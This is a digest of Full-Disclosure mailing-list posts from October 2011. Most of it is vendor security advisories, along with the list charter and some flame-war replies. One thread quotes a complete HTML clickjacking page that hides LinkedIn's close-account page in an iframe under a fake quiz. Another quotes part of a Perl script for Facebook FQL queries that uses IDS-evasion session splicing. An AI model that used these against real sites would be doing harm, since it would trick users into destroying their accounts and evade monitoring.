[Full-disclosure] [SECURITY] [DSA 2319-1] policykit-1 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2319-1 secur...@debian.org http://www.debian.org/security/ Thijs Kinkhorst October 8, 2011http://www.debian.org/security/faq - - Package: policykit-1 Vulnerability : race condition Problem type : local Debian-specific: no CVE ID : CVE-2011-1485 Debian Bug : 644500 Neel Mehta discovered that a race condition in Policykit, a framework for managing administrative policies and privileges, allowed local users to elevate privileges by executing a setuid program from pkexec. The oldstable distribution (lenny) does not contain the policykit-1 package. For the stable distribution (squeeze), this problem has been fixed in version 0.96-4+squeeze1. For the testing distribution (wheezy) and unstable distribution (sid), this problem has been fixed in version 0.101-4. We recommend that you upgrade your policykit-1 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJOkEsWAAoJEOxfUAG2iX57lgwIAJ/cc9EDpnktdo5hA8g0d8+P NNyJAJ4qJgkWvQyUqmWsISM6uWBsMUPp8WmNg8uEDqoc1r6y6XhNW0+QnZzfvz9W /+SH/Dfr3d0K7fiTPovd/EXLozacNPKzKyHCw5yEauELbU7HYXW2AFs5JegeF7AZ LWy96bwk62atPa1dVvNmjTAo4lpGq3DDdQWrnMqP0phLPocN7kVrmElnvlMhXz5D V7vDBJYUm1jNfajlMSgSyrtM6AhiXiHgrLQWzJ/c2n3osU+wzUFfSq6jGmmI6dir v8D6BHaEPp8dGHSquvv7DqHRBl9siupBTUgjtabgX9JQCLJEntmldJBfsfj9Fjg= =tOHw -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2320-1] dokuwiki regression fix
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2320-1 secur...@debian.org http://www.debian.org/security/ Thijs Kinkhorst October 8, 2011http://www.debian.org/security/faq - - Package: dokuwiki Vulnerability : regression fix Problem type : remote Debian-specific: no CVE ID : CVE-2011-2510 Debian Bug : 644145 The dokuwiki update included in Debian Lenny 5.0.9 to address a cross site scripting issue (CVE-2011-2510) had a regression rendering links to external websites broken. This update corrects that regression. For the oldstable distribution (lenny), this problem has been fixed in version 0.0.20080505-4+lenny4. We recommend that you upgrade your dokuwiki packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJOkE33AAoJEOxfUAG2iX57bPIH/jFv4OmdhGeS12FMyZW/oq9D CW95YdhyuZA3xRSF9fViksRAFL6D1+5tAMp7mA4GfaYm35F7nmHyHvHfYUaEnz9j AfTGlcSwDO0pXPhcLbNH28W3T/jv48fgOE3BKvjva7drKwyF4JHjRFFcYczeqMBe SU75CwoEHqK9TnkMQJObRFkzfbx6+IJh51qjMdA4DpCzkwDSDPpNtXZpa+zoGdU+ ICLKqUK/UYwCpwu4ycIQ/r2oeDxzk9bf+PHRtNRe5JXU4az08wGBl+ClTK+u/vqT Fw8VRnhltwpzN9eA34R8S058JGnNom3SVoMWJIIwvrxcnKfLNR6a8gsLUNZS6KQ= =/Uh5 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] List Charter
[Full-Disclosure] Mailing List Charter John Cartwright jo...@grok.org.uk - Introduction Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia. - Subscription Information - Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-requ...@lists.grok.org.uk, send the word 'help' in either the message subject or body for details. - Moderation Management - The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/. - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. - Posting Guidelines - The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclosure@lists.grok.org.uk. Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. - Charter Additions/Changes - The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a consensus has been reached. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Some hash values
Hey all, I believe that this is the best place to post the following hash values: MD5Sum:a762a3b9cbfb3d63034646087680b254 SHA1sum:6f25d72bd693b52de25c36d04f9e17f945420580 SHA256sum:d5886dd14f3eac029d771da6bcc6d49bc2e50c79159e5390c9c0776c725243a5 Cheers, cues0r___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 201110-01 ] OpenSSL: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201110-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: OpenSSL: Multiple vulnerabilities Date: October 09, 2011 Bugs: #303739, #308011, #322575, #332027, #345767, #347623, #354139, #382069 ID: 201110-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities were found in OpenSSL, allowing for the execution of arbitrary code and other attacks. Background == OpenSSL is an Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general purpose cryptography library. Affected packages = --- Package / Vulnerable /Unaffected --- 1 dev-libs/openssl 1.0.0e = 1.0.0e Description === Multiple vulnerabilities have been discovered in OpenSSL. Please review the CVE identifiers referenced below for details. Impact == A context-dependent attacker could cause a Denial of Service, possibly execute arbitrary code, bypass intended key requirements, force the downgrade to unintended ciphers, bypass the need for knowledge of shared secrets and successfully authenticate, bypass CRL validation, or obtain sensitive information in applications that use OpenSSL. Workaround == There is no known workaround at this time. Resolution == All OpenSSL users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-libs/openssl-1.0.0e NOTE: This is a legacy GLSA. Updates for all affected architectures are available since September 17, 2011. It is likely that your system is already no longer affected by most of these issues. References == [ 1 ] CVE-2009-3245 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3245 [ 2 ] CVE-2009-4355 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4355 [ 3 ] CVE-2010-0433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0433 [ 4 ] CVE-2010-0740 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0740 [ 5 ] CVE-2010-0742 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0742 [ 6 ] CVE-2010-1633 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1633 [ 7 ] CVE-2010-2939 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2939 [ 8 ] CVE-2010-3864 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3864 [ 9 ] CVE-2010-4180 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4180 [ 10 ] CVE-2010-4252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4252 [ 11 ] CVE-2011-0014 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0014 [ 12 ] CVE-2011-3207 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3207 [ 13 ] CVE-2011-3210 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3210 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201110-01.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook/google+ Cross-Site Content Forgery exploit
On 10/8/2011 8:45 PM, Antony widmal wrote: Shit man, that's serious business (S-K trying to take over FD) Of course it's not your code dickwad. All ya know is talking posting shit on an IT Sec mailing list. On Sat, Oct 8, 2011 at 7:53 PM, Laurelai laure...@oneechan.org mailto:laure...@oneechan.org wrote: Blackhatacademy has asked me to post this to the mailing list as im one of the instructors there, I did not personally develop the exploit, please direct questions regarding it to hatter on irc.blackhatacademy.org http://irc.blackhatacademy.org Overview Over the years, facebook has been vulnerable to numerous web exploitation http://www.blackhatacademy.org/security101/index.php?title=Web_Exploitation techniques, such as XSS http://www.blackhatacademy.org/security101/index.php?title=XSS, FQL injection (similar to SQL injection http://www.blackhatacademy.org/security101/index.php?title=SQL_injection), application worms, and redirect protection bypass. Because they continue to attempt to write their own language implementations, they are repeatedly vulnerable. Security by obscurity doesn't work if they document their own markup language http://developers.facebook.com/docs/reference/fbml/ and query language http://developers.facebook.com/docs/reference/fql/ for attackers. History XSS http://www.blackhatacademy.org/security101/index.php?title=XSS in facebook first started out as a flaw in their fbml http://developers.facebook.com/docs/reference/fbml/ markup and subsequently became evident in a variety of facebook applications. Applications http://www.blackhatacademy.org/security101/index.php?title=Applications also exposed users to third party attacks that could affect a user's web browser or force actions as the affected user. Now there is a way to bypass content restrictions on links and posts put on a user's public wall. Facebook was notified of these vulnerabilities http://www.blackhatacademy.org/security101/index.php?title=Vulnerability on July 31st, 2011. To date (October 4, 2011) Facebook has yet to do anything about this; demonstrating a deplorable lack of reasonable care for all of their users. For this reason, the vulnerability http://www.blackhatacademy.org/security101/index.php?title=Vulnerability proof of concept code is being brought to light. Facebook has only recently purchased websense to attempt to push this vulnerability under the rug, however the exploit still works. FQL Simply requiring an API key for privileged queries does not protect facebook from people arbitrarily obtaining one. Facebook was even so kind as to give a reference of tables and columns in the documentation for FQL. To access Facebook's FQL API, it takes only a well-formed HTTP request with an embedded API key to return a valid XML object. FQL Does not allow the use of JOINS, however it is not needed as everything is thoroughly documented. Attackers can misuse this during the creation of a malicious facebook application or directly on the FQL development api page for information gathering. The implementation below uses LibWhisker2 for IDS evasion via session splicing. #!/usr/bin/perl use warnings; use XML::Simple; use LW2; use Getopt::Std; my %opts; getopts('q:',\%opts); my $query = $opts{q} if defined $opts{q}; $query = SELECT pic_big FROM user WHERE uid=666 unless defined $opts{q}; my $ref = fqlQuery($query); foreach my $parent (sort keys %{$ref}) { if (%{$ref-{$parent}}) { print $parent:\n; foreach my $key (sort keys %{$ref-{$parent}}) { if (%{$ref-{$parent}-{$key}}) { print \t$key :\n; foreach my $mojo (sort keys %{$ref-{$parent}-{$key}}) { print \t\t$mojo : ; print $ref-{$parent}-{$key}-{$mojo}; print \n; } } else {print \t$key : ; print $ref-{$parent}-{$key}; print \n; } } } else { print $parent : . $ref-{$parent} . \n; } } sub fqlQuery{ my $q = shift; $q =~ s/ /%20/g; my $link = http://api.facebook.com/method/fql.query?query=$q; http://api.facebook.com/method/fql.query?query=$q; my $text = download($link,api.facebook.com http://api.facebook.com); my $ref = XMLin($text); return($ref); } sub download { my $uri = shift; my $try = 5; my $host = shift; my %request; my %response; LW2::http_init_request(\%request);
[Full-disclosure] [ GLSA 201110-02 ] Wireshark: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201110-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Wireshark: Multiple vulnerabilities Date: October 09, 2011 Bugs: #323859, #330479, #339401, #346191, #350551, #354197, #357237, #363895, #369683, #373961, #381551, #383823, #386179 ID: 201110-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in Wireshark allow for the remote execution of arbitrary code, or a Denial of Service condition. Background == Wireshark is a versatile network protocol analyzer. Affected packages = --- Package / Vulnerable /Unaffected --- 1 net-analyzer/wireshark1.4.9= 1.4.9 Description === Multiple vulnerabilities have been discovered in Wireshark. Please review the CVE identifiers referenced below for details. Impact == A remote attacker could send specially crafted packets on a network being monitored by Wireshark, entice a user to open a malformed packet trace file using Wireshark, or deploy a specially crafted Lua script for use by Wireshark, possibly resulting in the execution of arbitrary code, or a Denial of Service condition. Workaround == There is no known workaround at this time. Resolution == All Wireshark users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-analyzer/wireshark-1.4.9 References == [ 1 ] CVE-2010-2283 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2283 [ 2 ] CVE-2010-2284 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2284 [ 3 ] CVE-2010-2285 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2285 [ 4 ] CVE-2010-2286 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2286 [ 5 ] CVE-2010-2287 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2287 [ 6 ] CVE-2010-2992 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2992 [ 7 ] CVE-2010-2993 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2993 [ 8 ] CVE-2010-2994 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2994 [ 9 ] CVE-2010-2995 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2995 [ 10 ] CVE-2010-3133 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3133 [ 11 ] CVE-2010-3445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3445 [ 12 ] CVE-2010-4300 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4300 [ 13 ] CVE-2010-4301 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4301 [ 14 ] CVE-2010-4538 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4538 [ 15 ] CVE-2011-0024 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0024 [ 16 ] CVE-2011-0444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0444 [ 17 ] CVE-2011-0445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0445 [ 18 ] CVE-2011-0538 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0538 [ 19 ] CVE-2011-0713 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0713 [ 20 ] CVE-2011-1138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1138 [ 21 ] CVE-2011-1139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1139 [ 22 ] CVE-2011-1140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1140 [ 23 ] CVE-2011-1141 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1141 [ 24 ] CVE-2011-1142 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1142 [ 25 ] CVE-2011-1143 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1143 [ 26 ] CVE-2011-1590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1590 [ 27 ] CVE-2011-1591 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1591 [ 28 ] CVE-2011-1592 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1592 [ 29 ] CVE-2011-1956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1956 [ 30 ] CVE-2011-1957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1957 [ 31 ] CVE-2011-1958 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1958 [ 32 ] CVE-2011-1959 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1959 [ 33 ] CVE-2011-2174 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2174 [ 34 ] CVE-2011-2175 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2175 [ 35 ] CVE-2011-2597 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2597 [ 36 ] CVE-2011-2698 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2698 [ 37 ] CVE-2011-3266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3266 [ 38 ] CVE-2011-3360 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3360 [ 39 ] CVE-2011-3482
Re: [Full-disclosure] Facebook/google+ Cross-Site Content Forgery exploit
On Sun, 09 Oct 2011 08:52:46 PDT, Laurelai said: You sir, are an idiot. s/an/a/ - FTFY. pgp2xbRwXzvQi.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:131-1 ] libxml
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:131-1 http://www.mandriva.com/security/ ___ Package : libxml Date: October 9, 2011 Affected: 2011. ___ Problem Description: Multiple vulnerabilities has been discovered and corrected in libxml/libxml2: Integer overflow in xpath.c in libxml2 2.6.x through 2.6.32 and 2.7.x through 2.7.8, and libxml 1.8.16 and earlier, allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted XML file that triggers a heap-based buffer overflow when adding a new namespace node, related to handling of XPath expressions (CVE-2011-1944). The updated packages have been patched to correct this issue. Update: Packages were misssing for Mandriva Linux 2011 with the MDVSA-2011:131 advisory which are now being provided. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1944 ___ Updated Packages: Mandriva Linux 2011: 66b5d13d1e9e6dc5a79d7f6bdce5e6bc 2011/i586/libxml1-1.8.17-18.1-mdv2011.0.i586.rpm 022ffa3441d84441f2bd312f356549ce 2011/i586/libxml1-devel-1.8.17-18.1-mdv2011.0.i586.rpm 6384102d5b61ac2c7cf4d790d90f5919 2011/i586/libxml2_2-2.7.8-6.1-mdv2011.0.i586.rpm 284c49656c3988fcbdba703b904205fa 2011/i586/libxml2-devel-2.7.8-6.1-mdv2011.0.i586.rpm 73489a6fbb129af2cd735480cf029168 2011/i586/libxml2-python-2.7.8-6.1-mdv2011.0.i586.rpm 9a813862bf2269f89bb7e81414b3e093 2011/i586/libxml2-utils-2.7.8-6.1-mdv2011.0.i586.rpm 8935abd10e88cf92c7c857a1bf8c6290 2011/SRPMS/libxml-1.8.17-18.1.src.rpm 85c9a012833b1de55c7f0bc26a79a2b1 2011/SRPMS/libxml2-2.7.8-6.1.src.rpm Mandriva Linux 2011/X86_64: 9bc39714f2af5c88bb7bedc7bc72856d 2011/x86_64/lib64xml1-1.8.17-18.1-mdv2011.0.x86_64.rpm 083c2e62c3609ed8cff788fb2cda1b58 2011/x86_64/lib64xml1-devel-1.8.17-18.1-mdv2011.0.x86_64.rpm 097866d7240ae59af8843e487af3c755 2011/x86_64/lib64xml2_2-2.7.8-6.1-mdv2011.0.x86_64.rpm ef477ce0daadd3d8427a76d64b0aa2f1 2011/x86_64/lib64xml2-devel-2.7.8-6.1-mdv2011.0.x86_64.rpm aafe476b2a6ac9b00cd1e91188680ac9 2011/x86_64/libxml2-python-2.7.8-6.1-mdv2011.0.x86_64.rpm 16e64c023b78b45c912640c777df415d 2011/x86_64/libxml2-utils-2.7.8-6.1-mdv2011.0.x86_64.rpm 8935abd10e88cf92c7c857a1bf8c6290 2011/SRPMS/libxml-1.8.17-18.1.src.rpm 85c9a012833b1de55c7f0bc26a79a2b1 2011/SRPMS/libxml2-2.7.8-6.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFOkay3mqjQ0CJFipgRAl4lAKC64p2JaOk80k+ROi2UCIC13CcRyACgjhD5 hDGQicxIZ7lyOeGw2bD+oY0= =BXwg -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Some hash values
I believe that this is the best place to post the following hash values: MD5Sum:a762a3b9cbfb3d63034646087680b254 SHA1sum:6f25d72bd693b52de25c36d04f9e17f945420580 SHA256sum:d5886dd14f3eac029d771da6bcc6d49bc2e50c79159e5390c9c0776c725243a5 No, for these specific hash values, I believe the appropriate place to post them would be deviantArt. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
it seems that you aren't familiar what Clickjacking means then... On Sat, Oct 8, 2011 at 10:01 PM, xD 0x41 sec...@gmail.com wrote: Thats just lame dude if you could remove OTHER poples accounts, then id say 8clap clap*... but own account... whjat about just clicking close account , and lets skip creating a html page, for this... :) cheers On 8 October 2011 17:06, asish agarwalla asishagarwa...@gmail.com wrote: Be logged into Linkedin, in firefox Create a HTML page using the below code Open the created HTML page in a new firefox tab Play the simple game html head style button.dummy1{position:absolute;top:75px;left:177px;z-index:-10} button.dummy3{position:absolute;top:214px;left:177px;z-index:-10} #Div3{ opacity: 0; position: absolute; top: 25px; left: 160px; } #Div2{ opacity: 1; position: absolute; top: 65px; left: 340px; } #Div1 { opacity: 1; position: absolute; top: 65px; left: 195px; } #victim2 { opacity: 1; position: absolute; top: 65px; left: 50px; } #victim { opacity: 0.4; position: absolute; top: -226px; left: -35px; width:800px; height: 800px; } /style /head body div h1Please Click Twice on the Right Options And Then Click Submit/h1 /div div id=Div3 h155+27=?/h1 /div div id=victim2 h155 /h1 /div div id=Div1 h182/h1 /div div id=Div2 h195/h1 /div button type=button class=dummy3Submit/button div id=victim iframe src=https://www.linkedin.com/secure/settings?closemyaccountstart=goback=.nas_*1_*1_*1; border=0 scrolling=no width=650 height=1100/iframe /div /body /html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook/google+ Cross-Site Content Forgery exploit
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 10/9/2011 12:04 PM, valdis.kletni...@vt.edu wrote: On Sun, 09 Oct 2011 08:52:46 PDT, Laurelai said: You sir, are an idiot. s/an/a/ - FTFY. A goes before words that begin with consonants. An goes before words that begin with vowels. The more you know. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.17 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJOkeoxAAoJEMtrOhzH8m1pnyUQAIBCSeFX0kv39a/OYx9EGdOI j3PID8kFBESUA3N1+1gA4dq9KBCQrXzM78gJ0HoKSOc5+XdcpmO4ImRtIfNb4nsW jXfNlR2Zn6rd9qk+8u6c7VlsZR9Q8b8jFojPZ1qq5jrZP/B3L7+oKAxCI9Z+6XSn 1hFtGCP0ODuX10hjMLmaJv0zyzqnoNI6Ifu+Pt+sFauU2eg3e5aq6+nDSyODcy/A 2517pai2YTN/9qk3YSK+6DRwb1lhUK/i2XX2TOVhuIZkG+HgbDaywczQ17MH+6Vv iP/fm0scXHKGRKOCDl2XeSKkEjHRKS8sF/B9B1qpCObl5EcDPg58MBRhAQjCZxuo mh5hEcrdb+HFibiWQi8aV/BZeAaX9V0AV4ZwPdbEVKQvSZqr3YTUHL8PPcDIszja OTQqwKd3hlNOxIiG/1TiXIe+UEcqknO9Q43TAqJTTT5oQXGdgRv1d/1w1PDnr/6I gjum1tpJUM/83uTaQbGHq2zM+Lr9VFinXZMaYohu5Zr3rBxyOyU1II115rJT+2q6 0dyZ7yK5nblFwYTYrF+8OiC7ZBHT+HHWjn8bdW6z3x4A+hR6Z8yu0AeEdzYQfnLS N68dIhnllxhwgaIGTgPQqnintPnT1BO1egjmROjdzduaTDfTbp1H9mzNZmz6R3hT 9/KfNcozodZg3IAR0Mju =DN3I -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook/google+ Cross-Site Content Forgery exploit
On Sun, 09 Oct 2011 13:38:41 CDT, Laurelai said: On 10/9/2011 12:04 PM, valdis.kletni...@vt.edu wrote: On Sun, 09 Oct 2011 08:52:46 PDT, Laurelai said: You sir, are an idiot. s/an/a/ - FTFY. A goes before words that begin with consonants. An goes before words that begin with vowels. The more you know. Hint - it's even funnyier if you reread my note and select view all headers. ;) pgpaAfD1YMPTb.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook/google+ Cross-Site Content Forgery exploit
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 10/9/2011 2:18 PM, valdis.kletni...@vt.edu wrote: On Sun, 09 Oct 2011 13:38:41 CDT, Laurelai said: On 10/9/2011 12:04 PM, valdis.kletni...@vt.edu wrote: On Sun, 09 Oct 2011 08:52:46 PDT, Laurelai said: You sir, are an idiot. s/an/a/ - FTFY. A goes before words that begin with consonants. An goes before words that begin with vowels. The more you know. Hint - it's even funnyier if you reread my note and select view all headers. ;) Yeah i caught that when you told me, well played sir..well played. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.17 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJOkfPUAAoJEMtrOhzH8m1pT3YP/jbFvCk3MMEB4OtWmTlXfV86 kjk0h/VDOM8TWj3tIh9Wf7CAmXKIR5zGKPyHB9mshYTCx8XpR4qfs1mSMkh6MyXl NV9ha+aaKSfPJj7sPfBPhiS6xcXnmlGgX/VFKSWLThF0KypdRJ3L8BpdUZOZ6zaw c+6rPq4o0XZ7yH2KUIGpOFp/noKUEj/lI8udAo7Q6trkft9GZ8sm9SCBTjTiUmq9 /7LsDvjX2Oa39/opTb6w6Z05ANGqLG4uL1mrvdAfHsBIfqHw1GzuJYTRtPXaB9Wf iQfJihVpy2p/fi9/eMPbyYOAuMdbBZsENmUFRDQFvi3AdXvpLUVHMKFWQX0Qlhif ElYAF1NG9m/WbIIjkgBnByhBQ+0vvP61H0a4ZIS+BUrxOtPTW0WS8r2zRIcX8rLX FNly7dO23bMX+xiUp2JGtnpMu0x6Qdcez7Tc26WwqTwD6wNRZq1gtgsygsS5MIET 8q0qEcAth/bA4zTXnk7EmXgFlPFGmTpGb+Ls9XH4XCJHybS5jc4AAAMvbw7NgmKd WnC6Cmp/NR435XRr77UNpR/RqOmDQ7SD6dy3zFzrw9wbYKmASJzTSGP0J/fL1/dD DedGc4E+3zutXg2PjNVSwbuwPeRT2TOpprfnwQlU5yJ1S0zv1M6T2A4ieAjiVtSI e5/OdQBsZ5rvxi04SBJ1 =W/oP -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by 